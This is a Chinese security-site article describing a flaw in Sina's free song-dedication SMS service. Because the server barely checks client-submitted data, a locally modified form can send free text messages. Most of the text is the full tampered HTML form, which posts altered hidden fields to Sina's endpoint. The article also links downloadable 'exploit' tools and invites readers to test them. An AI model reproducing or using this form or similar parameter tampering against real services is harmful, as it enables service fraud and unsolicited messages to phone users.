漏洞描述
自从我上次发现新浪网免费点歌的一个小小漏洞,并利用此漏洞做了个免费短信发送软件后,新浪网对此漏洞做了一定的修复,不过一些问题依然是存在的。虽然新浪加了验证码看似堵上了漏洞,可是本地提交并修改数据却还是没有很好的解决,只在短信服务器简单判断一下!所以这个免费发短信的漏洞依然没有解决!我们还是有机会免费发短信的,我现已做出了利用此漏洞的相关工具。此漏洞我以向新浪网反馈,相信很快会对此漏洞做出修复的。
示例:
此代码是基于新浪免费点歌发送页面修改得来的,内容如下:
<html><head> <meta http-equiv="Content-type" content="text/html; charset=gb2312"> <title>新浪短信免费点歌服务漏洞测试</title> <style type="text/css"> <!-- .style1 {font-size: 12px} .style2 { 字串1 color: #000000; font-size: 12px; } --> </style> </head> <center> <table width=600 bgcolor=#336799 border=0 cellpadding=0 cellspacing=0> <tr valign=top><td width=46> </td> <td width=511 background=web_pic/zhufudd205.gif style="background-repeat:repeat-y" align=center> <table width=511 border=0 cellpadding=0 cellspacing=0> <tr valign=top><td width=39 rowspan=2 align=center></td> <td width=361 rowspan=2 align=center> <form method="post" action="http://bobo.sina.com.cn/web/get_pwd1.php" onsubmit="return check_form(this);"> <input type="hidden" name="test" value="1"> <input type="hidden" name="id" value="1040110001"> <input type=hidden name="send_sms5" size=8 style="border:#87522A 1px solid" value="庞龙"> 字串3 <input type=hidden name="send_sms6" size=18 style="border:#87522A 1px solid" value="两只蝴蝶"> <table width=360 border=0 align="center" cellpadding=0 cellspacing=0> <tr><td width=360 height=30><span class="style1"><font color=#87522A>对方手机号码 <input type=text name="mobilephone" value=13 size=11 maxlength=11 onMouseOver=''this.focus();'' style="border:#87522A 1px solid"> 我的手机号码 <input type=text name="user" value=13 size=11 maxlength=11 onMouseOver=''this.focus();'' style="border:#87522A 1px solid"> </span></td> </tr> <tr><td height=30><span class="style1"> <select style="border:#87522A 1px solid;width:90px" name="send_sms"> <option>Hi,懒人短信漏洞测试</option> </select> <input type=text name="send_sms2" onclick="javascript:this.value=''''" size=12 maxlength=6 value="填入对方昵称" style="border:#87522A 1px solid" > 字串6 <select style="border:#87522A 1px solid;width:100px" name="send_sms3"> <option>在忙什么?我在测试短信</option> </select> </span></td> </tr> <tr><td height=1 bgcolor=#87522A><span class="style1"></span></td> </tr> <tr><td height=21><span class="style1"><font color=#87522A>我是 <input type=text name="send_sms4" onclick="javascript:this.value=''''" size=12 maxlength=6 value="填入自己昵称" style="border:#87522A 1px solid"> 祝 <select style="border:#87522A 1px solid;width:90px" name="send_sms7"> <option>心想事成,懒人短信测试</option> </select> </span></td> </tr> <tr><td height=1 bgcolor=#87522A><span class="style1"></span></td> </tr> <tr> <td height=3><div align="center" class="style1">如果第一次使用验证码使用错误,刷新再试即可</div></td> 字串7 </tr> <tr><td height=1 bgcolor=#87522A><span class="style1"></span></td> </tr> <tr><td height=35> <span class="style1"><font color=#87522A>验证码: <input type=text name="test_img" size=8> <img src="http://bobo.sina.com.cn/web/image.php?act=init" align=absmiddle> <input type=image src=http://www.5iuu.com/Article/UploadFiles/200412/20041225235232945.gifborder=0 align=absmiddle> </span></td> </tr> <tr><td height=1 bgcolor=#87522A></td></tr> <tr> <td height=20><span class="style2">(接受方手机目前只限中国移动用户)</span></td> </tr> </table> </form> |
有兴趣的朋友自行测试。
相关exploits
测试页面zip包下载:http://lanmen.nease.net/DOWNLOAD/sinatest.zip 字串9
测试程序zip包下载:http://lanmen.nease.net/DOWNLOAD/SMSexploits.zip
文章来源地址:http://www.hackhome.com/html/wlcl/wlaq/2006/0610/26566.html